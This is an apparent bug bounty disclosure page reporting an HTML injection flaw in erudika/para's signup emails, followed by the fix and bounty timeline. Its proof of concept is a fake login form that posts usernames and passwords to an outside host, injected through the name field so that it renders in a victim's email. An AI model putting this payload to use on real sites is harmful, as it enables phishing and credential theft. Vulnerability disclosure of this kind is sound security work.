Html Injection lead to cross site scripting in erudika/para

Valid

Reported on

May 14th 2022


Description

Hi i Found a way to inject html in user's email. So in this case if a attacker set name of victim as html form it will be rendered by your system and then the render html will be sent to the victim

Proof of Concept

  1. Goto https://paraio.com/signup/ and in name field add this payload

<form action="https://brutelogic.com.br/poc.svg/" method="post"> <label for="username">Username:</label> <input class="userbox" type="text" name="username"/><br /> <label for="password">Password:</label> <input type="text" name="password" > <input class="button" type="submit" value="submit" /> </form>

  1. Enter email of victim and create new account
  1. Now goto mail and check you will see our code has been rendered as html
  1. Submit form and xss

// PoC.js var payload = ... ```

Impact

Cross site scripting used to steal users cookies which will eventually lead to account takeover

We are processing your report and will contact the erudika/para team within 24 hours. a month ago
Distorted_Hacker modified the report
a month ago
We have contacted a member of the erudika/para team and are waiting to hear back a month ago
Alex Bogdanovski validated this vulnerability a month ago
Distorted_Hacker has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Alex Bogdanovski confirmed that a fix has been merged on 9d844f a month ago
Alex Bogdanovski has been awarded the fix bounty
Distorted_Hacker
a month ago

Researcher


Hi @admin can you please assign a CVE

Jamie Slome
a month ago

Admin


Sorted 👍

to join this conversation